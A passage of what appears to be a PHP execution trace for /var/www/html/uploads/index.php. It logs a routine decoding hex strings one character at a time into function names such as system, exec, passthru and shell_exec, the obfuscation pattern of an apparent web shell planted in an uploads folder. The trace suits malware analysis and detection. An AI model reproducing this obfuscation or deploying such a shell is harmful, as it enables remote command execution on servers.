2		A						/var/www/html/uploads/index.php	177	$i += 2
3	425	0	0.016207	583896	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	425	1	0.016220	583944
3	425	R			121
3	426	0	0.016232	583864	chr	0		/var/www/html/uploads/index.php	178	1	121
3	426	1	0.016243	583904
3	426	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	427	0	0.016275	583896	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	427	1	0.016287	583944
3	427	R			115
3	428	0	0.016300	583864	chr	0		/var/www/html/uploads/index.php	178	1	115
3	428	1	0.016312	583904
3	428	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	429	0	0.016341	583896	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	429	1	0.016353	583944
3	429	R			116
3	430	0	0.016366	583864	chr	0		/var/www/html/uploads/index.php	178	1	116
3	430	1	0.016379	583904
3	430	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	431	0	0.016409	583896	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	431	1	0.016421	583944
3	431	R			101
3	432	0	0.016435	583864	chr	0		/var/www/html/uploads/index.php	178	1	101
3	432	1	0.016446	583904
3	432	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	433	0	0.016477	583896	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	433	1	0.016492	583944
3	433	R			109
3	434	0	0.016505	583864	chr	0		/var/www/html/uploads/index.php	178	1	109
3	434	1	0.016518	583904
3	434	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	422	1	0.016550	583864
2	422	R			'system'
1		A						/var/www/html/uploads/index.php	8	$func[22] = 'system'
1		A						/var/www/html/uploads/index.php	7	$i++
2	435	0	0.016584	583864	dehex	1		/var/www/html/uploads/index.php	8	1	'65786563'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 7
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	436	0	0.016627	583896	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	436	1	0.016639	583944
3	436	R			101
3	437	0	0.016652	583864	chr	0		/var/www/html/uploads/index.php	178	1	101
3	437	1	0.016664	583904
3	437	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	438	0	0.016695	583928	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	438	1	0.016708	583976
3	438	R			120
3	439	0	0.016720	583896	chr	0		/var/www/html/uploads/index.php	178	1	120
3	439	1	0.016732	583936
3	439	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	440	0	0.016763	583928	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	440	1	0.016775	583976
3	440	R			101
3	441	0	0.016787	583896	chr	0		/var/www/html/uploads/index.php	178	1	101
3	441	1	0.016798	583936
3	441	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	442	0	0.016829	583928	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	442	1	0.016840	583976
3	442	R			99
3	443	0	0.016853	583896	chr	0		/var/www/html/uploads/index.php	178	1	99
3	443	1	0.016865	583936
3	443	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	435	1	0.016896	583896
2	435	R			'exec'
1		A						/var/www/html/uploads/index.php	8	$func[23] = 'exec'
1		A						/var/www/html/uploads/index.php	7	$i++
2	444	0	0.016930	583896	dehex	1		/var/www/html/uploads/index.php	8	1	'7061737374687275'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	445	0	0.016972	583928	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	445	1	0.016984	583976
3	445	R			112
3	446	0	0.016996	583896	chr	0		/var/www/html/uploads/index.php	178	1	112
3	446	1	0.017008	583936
3	446	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	447	0	0.017050	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	447	1	0.017062	584008
3	447	R			97
3	448	0	0.017074	583928	chr	0		/var/www/html/uploads/index.php	178	1	97
3	448	1	0.017086	583968
3	448	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	449	0	0.017116	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	449	1	0.017128	584008
3	449	R			115
3	450	0	0.017140	583928	chr	0		/var/www/html/uploads/index.php	178	1	115
3	450	1	0.017152	583968
3	450	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	451	0	0.017182	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	451	1	0.017212	584008
3	451	R			115
3	452	0	0.017224	583928	chr	0		/var/www/html/uploads/index.php	178	1	115
3	452	1	0.017236	583968
3	452	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	453	0	0.017272	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	453	1	0.017284	584008
3	453	R			116
3	454	0	0.017296	583928	chr	0		/var/www/html/uploads/index.php	178	1	116
3	454	1	0.017307	583968
3	454	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	455	0	0.017337	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	455	1	0.017349	584008
3	455	R			104
3	456	0	0.017361	583928	chr	0		/var/www/html/uploads/index.php	178	1	104
3	456	1	0.017372	583968
3	456	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	457	0	0.017402	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	457	1	0.017413	584008
3	457	R			114
3	458	0	0.017425	583928	chr	0		/var/www/html/uploads/index.php	178	1	114
3	458	1	0.017437	583968
3	458	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	459	0	0.017467	583960	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	459	1	0.017478	584008
3	459	R			117
3	460	0	0.017490	583928	chr	0		/var/www/html/uploads/index.php	178	1	117
3	460	1	0.017502	583968
3	460	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	444	1	0.017531	583936
2	444	R			'passthru'
1		A						/var/www/html/uploads/index.php	8	$func[24] = 'passthru'
1		A						/var/www/html/uploads/index.php	7	$i++
2	461	0	0.017566	583936	dehex	1		/var/www/html/uploads/index.php	8	1	'7368656c6c5f65786563'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 19
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	462	0	0.017608	583968	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	462	1	0.017620	584016
3	462	R			115
3	463	0	0.017632	583936	chr	0		/var/www/html/uploads/index.php	178	1	115
3	463	1	0.017643	583976
3	463	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	464	0	0.017673	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	464	1	0.017685	584048
3	464	R			104
3	465	0	0.017697	583968	chr	0		/var/www/html/uploads/index.php	178	1	104
3	465	1	0.017708	584008
3	465	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	466	0	0.017739	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	466	1	0.017750	584048
3	466	R			101
3	467	0	0.017762	583968	chr	0		/var/www/html/uploads/index.php	178	1	101
3	467	1	0.017773	584008
3	467	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	468	0	0.017804	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	468	1	0.017816	584048
3	468	R			108
3	469	0	0.017828	583968	chr	0		/var/www/html/uploads/index.php	178	1	108
3	469	1	0.017839	584008
3	469	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	470	0	0.017869	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	470	1	0.017881	584048
3	470	R			108
3	471	0	0.017893	583968	chr	0		/var/www/html/uploads/index.php	178	1	108
3	471	1	0.017904	584008
3	471	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	472	0	0.017934	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	472	1	0.017946	584048
3	472	R			95
3	473	0	0.017958	583968	chr	0		/var/www/html/uploads/index.php	178	1	95
3	473	1	0.017970	584008
3	473	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	474	0	0.018003	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	474	1	0.018015	584048
3	474	R			101
3	475	0	0.018027	583968	chr	0		/var/www/html/uploads/index.php	178	1	101
3	475	1	0.018038	584008
3	475	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	476	0	0.018068	584000	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	476	1	0.018080	584048
3	476	R			120
3	477	0	0.018092	583968	chr	0		/var/www/html/uploads/index.php	178	1	120
3	477	1	0.018103	584008
3	477	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	478	0	0.018133	584008	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	478	1	0.018145	584056
3	478	R			101
3	479	0	0.018157	583976	chr	0		/var/www/html/uploads/index.php	178	1	101
3	479	1	0.018168	584016
3	479	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	480	0	0.018198	584008	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	480	1	0.018210	584056
3	480	R			99
3	481	0	0.018222	583976	chr	0		/var/www/html/uploads/index.php	178	1	99
3	481	1	0.018234	584016
3	481	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	461	1	0.018263	583976
2	461	R			'shell_exec'
1		A						/var/www/html/uploads/index.php	8	$func[25] = 'shell_exec'
1		A						/var/www/html/uploads/index.php	7	$i++
2	482	0	0.018297	583976	dehex	1		/var/www/html/uploads/index.php	8	1	'6f625f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 29
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	483	0	0.018340	584008	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	483	1	0.018351	584056
3	483	R			111
3	484	0	0.018364	583976	chr	0		/var/www/html/uploads/index.php	178	1	111
3	484	1	0.018375	584016
3	484	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	485	0	0.018405	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'62'
3	485	1	0.018417	584088
3	485	R			98
3	486	0	0.018429	584008	chr	0		/var/www/html/uploads/index.php	178	1	98
3	486	1	0.018441	584048
3	486	R			'b'
2		A						/var/www/html/uploads/index.php	178	$r .= 'b'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	487	0	0.018471	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	487	1	0.018483	584088
3	487	R			95
3	488	0	0.018495	584008	chr	0		/var/www/html/uploads/index.php	178	1	95
3	488	1	0.018506	584048
3	488	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	489	0	0.018535	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	489	1	0.018547	584088
3	489	R			103
3	490	0	0.018559	584008	chr	0		/var/www/html/uploads/index.php	178	1	103
3	490	1	0.018570	584048
3	490	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	491	0	0.018600	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	491	1	0.018612	584088
3	491	R			101
3	492	0	0.018624	584008	chr	0		/var/www/html/uploads/index.php	178	1	101
3	492	1	0.018635	584048
3	492	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	493	0	0.018665	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	493	1	0.018677	584088
3	493	R			116
3	494	0	0.018689	584008	chr	0		/var/www/html/uploads/index.php	178	1	116
3	494	1	0.018700	584048
3	494	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	495	0	0.018733	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	495	1	0.018745	584088
3	495	R			95
3	496	0	0.018757	584008	chr	0		/var/www/html/uploads/index.php	178	1	95
3	496	1	0.018768	584048
3	496	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	497	0	0.018798	584040	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	497	1	0.018809	584088
3	497	R			99
3	498	0	0.018821	584008	chr	0		/var/www/html/uploads/index.php	178	1	99
3	498	1	0.018833	584048
3	498	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	499	0	0.018862	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	499	1	0.018874	584096
3	499	R			111
3	500	0	0.018886	584016	chr	0		/var/www/html/uploads/index.php	178	1	111
3	500	1	0.018897	584056
3	500	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	501	0	0.018927	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	501	1	0.018939	584096
3	501	R			110
3	502	0	0.018951	584016	chr	0		/var/www/html/uploads/index.php	178	1	110
3	502	1	0.018962	584056
3	502	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	503	0	0.018993	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	503	1	0.019005	584096
3	503	R			116
3	504	0	0.019017	584016	chr	0		/var/www/html/uploads/index.php	178	1	116
3	504	1	0.019028	584056
3	504	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	505	0	0.019058	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	505	1	0.019070	584096
3	505	R			101
3	506	0	0.019082	584016	chr	0		/var/www/html/uploads/index.php	178	1	101
3	506	1	0.019093	584056
3	506	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	507	0	0.019123	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	507	1	0.019135	584096
3	507	R			110
3	508	0	0.019147	584016	chr	0		/var/www/html/uploads/index.php	178	1	110
3	508	1	0.019158	584056
3	508	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	509	0	0.019188	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	509	1	0.019199	584096
3	509	R			116
3	510	0	0.019212	584016	chr	0		/var/www/html/uploads/index.php	178	1	116
3	510	1	0.019223	584056
3	510	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	511	0	0.019253	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	511	1	0.019265	584096
3	511	R			115
3	512	0	0.019277	584016	chr	0		/var/www/html/uploads/index.php	178	1	115
3	512	1	0.019288	584056
3	512	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	482	1	0.019317	584016
2	482	R			'ob_get_contents'
1		A						/var/www/html/uploads/index.php	8	$func[26] = 'ob_get_contents'
1		A						/var/www/html/uploads/index.php	7	$i++
2	513	0	0.019352	584016	dehex	1		/var/www/html/uploads/index.php	8	1	'6f625f656e645f636c65616e'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 23
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	514	0	0.019394	584048	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	514	1	0.019406	584096
3	514	R			111
3	515	0	0.019418	584016	chr	0		/var/www/html/uploads/index.php	178	1	111
3	515	1	0.019433	584056
3	515	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	516	0	0.019464	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'62'
3	516	1	0.019476	584128
3	516	R			98
3	517	0	0.019488	584048	chr	0		/var/www/html/uploads/index.php	178	1	98
3	517	1	0.019499	584088
3	517	R			'b'
2		A						/var/www/html/uploads/index.php	178	$r .= 'b'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	518	0	0.019529	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	518	1	0.019541	584128
3	518	R			95
3	519	0	0.019553	584048	chr	0		/var/www/html/uploads/index.php	178	1	95
3	519	1	0.019564	584088
3	519	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	520	0	0.019594	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	520	1	0.019606	584128
3	520	R			101
3	521	0	0.019618	584048	chr	0		/var/www/html/uploads/index.php	178	1	101
3	521	1	0.019630	584088
3	521	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	522	0	0.019659	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	522	1	0.019671	584128
3	522	R			110
3	523	0	0.019683	584048	chr	0		/var/www/html/uploads/index.php	178	1	110
3	523	1	0.019694	584088
3	523	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	524	0	0.019724	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	524	1	0.019736	584128
3	524	R			100
3	525	0	0.019748	584048	chr	0		/var/www/html/uploads/index.php	178	1	100
3	525	1	0.019760	584088
3	525	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	526	0	0.019791	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	526	1	0.019803	584128
3	526	R			95
3	527	0	0.019815	584048	chr	0		/var/www/html/uploads/index.php	178	1	95
3	527	1	0.019826	584088
3	527	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	528	0	0.019857	584080	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	528	1	0.019869	584128
3	528	R			99
3	529	0	0.019881	584048	chr	0		/var/www/html/uploads/index.php	178	1	99
3	529	1	0.019893	584088
3	529	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	530	0	0.019923	584088	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	530	1	0.019940	584136
3	530	R			108
3	531	0	0.019957	584056	chr	0		/var/www/html/uploads/index.php	178	1	108
3	531	1	0.019970	584096
3	531	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	532	0	0.020001	584088	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	532	1	0.020013	584136
3	532	R			101
3	533	0	0.020028	584056	chr	0		/var/www/html/uploads/index.php	178	1	101
3	533	1	0.020045	584096
3	533	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	534	0	0.020080	584088	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	534	1	0.020092	584136
3	534	R			97
3	535	0	0.020107	584056	chr	0		/var/www/html/uploads/index.php	178	1	97
3	535	1	0.020125	584096
3	535	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	536	0	0.020159	584088	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	536	1	0.020171	584136
3	536	R			110
3	537	0	0.020191	584056	chr	0		/var/www/html/uploads/index.php	178	1	110
3	537	1	0.020204	584096
3	537	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	513	1	0.020242	584056
2	513	R			'ob_end_clean'
1		A						/var/www/html/uploads/index.php	8	$func[27] = 'ob_end_clean'
1		A						/var/www/html/uploads/index.php	7	$i++
2	538	0	0.020279	584056	dehex	1		/var/www/html/uploads/index.php	8	1	'6469726e616d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 13
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	539	0	0.020320	584088	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	539	1	0.020332	584136
3	539	R			100
3	540	0	0.020345	584056	chr	0		/var/www/html/uploads/index.php	178	1	100
3	540	1	0.020357	584096
3	540	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	541	0	0.020388	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	541	1	0.020400	584168
3	541	R			105
3	542	0	0.020412	584088	chr	0		/var/www/html/uploads/index.php	178	1	105
3	542	1	0.020424	584128
3	542	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	543	0	0.020455	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	543	1	0.020467	584168
3	543	R			114
3	544	0	0.020479	584088	chr	0		/var/www/html/uploads/index.php	178	1	114
3	544	1	0.020491	584128
3	544	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	545	0	0.020521	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	545	1	0.020533	584168
3	545	R			110
3	546	0	0.020545	584088	chr	0		/var/www/html/uploads/index.php	178	1	110
3	546	1	0.020556	584128
3	546	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	547	0	0.020586	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	547	1	0.020598	584168
3	547	R			97
3	548	0	0.020610	584088	chr	0		/var/www/html/uploads/index.php	178	1	97
3	548	1	0.020622	584128
3	548	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	549	0	0.020652	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	549	1	0.020663	584168
3	549	R			109
3	550	0	0.020676	584088	chr	0		/var/www/html/uploads/index.php	178	1	109
3	550	1	0.020687	584128
3	550	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	551	0	0.020718	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	551	1	0.020729	584168
3	551	R			101
3	552	0	0.020742	584088	chr	0		/var/www/html/uploads/index.php	178	1	101
3	552	1	0.020753	584128
3	552	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	538	1	0.020783	584088
2	538	R			'dirname'
1		A						/var/www/html/uploads/index.php	8	$func[28] = 'dirname'
1		A						/var/www/html/uploads/index.php	7	$i++
2	553	0	0.020817	584088	dehex	1		/var/www/html/uploads/index.php	8	1	'6469736b5f746f74616c5f7370616365'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 31
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	554	0	0.020859	584120	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	554	1	0.020871	584168
3	554	R			100
3	555	0	0.020883	584088	chr	0		/var/www/html/uploads/index.php	178	1	100
3	555	1	0.020894	584128
3	555	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	556	0	0.020925	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	556	1	0.020937	584200
3	556	R			105
3	557	0	0.020952	584120	chr	0		/var/www/html/uploads/index.php	178	1	105
3	557	1	0.020964	584160
3	557	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	558	0	0.020995	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	558	1	0.021007	584200
3	558	R			115
3	559	0	0.021019	584120	chr	0		/var/www/html/uploads/index.php	178	1	115
3	559	1	0.021037	584160
3	559	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	560	0	0.021068	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'6b'
3	560	1	0.021080	584200
3	560	R			107
3	561	0	0.021093	584120	chr	0		/var/www/html/uploads/index.php	178	1	107
3	561	1	0.021104	584160
3	561	R			'k'
2		A						/var/www/html/uploads/index.php	178	$r .= 'k'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	562	0	0.021135	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	562	1	0.021147	584200
3	562	R			95
3	563	0	0.021159	584120	chr	0		/var/www/html/uploads/index.php	178	1	95
3	563	1	0.021171	584160
3	563	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	564	0	0.021201	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	564	1	0.021227	584200
3	564	R			116
3	565	0	0.021240	584120	chr	0		/var/www/html/uploads/index.php	178	1	116
3	565	1	0.021252	584160
3	565	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	566	0	0.021282	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	566	1	0.021294	584200
3	566	R			111
3	567	0	0.021306	584120	chr	0		/var/www/html/uploads/index.php	178	1	111
3	567	1	0.021318	584160
3	567	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	568	0	0.021348	584152	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	568	1	0.021360	584200
3	568	R			116
3	569	0	0.021372	584120	chr	0		/var/www/html/uploads/index.php	178	1	116
3	569	1	0.021383	584160
3	569	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	570	0	0.021414	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	570	1	0.021425	584208
3	570	R			97
3	571	0	0.021438	584128	chr	0		/var/www/html/uploads/index.php	178	1	97
3	571	1	0.021449	584168
3	571	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	572	0	0.021479	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	572	1	0.021492	584208
3	572	R			108
3	573	0	0.021504	584128	chr	0		/var/www/html/uploads/index.php	178	1	108
3	573	1	0.021515	584168
3	573	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	574	0	0.021546	584160	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	574	1	0.021557	584208
3	574	R			95
3	575	0	0.021569	584128	chr	0		/var/www/html/uploads/index.php	178	1	95
3	575	1	0.021580	584168
3	575	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
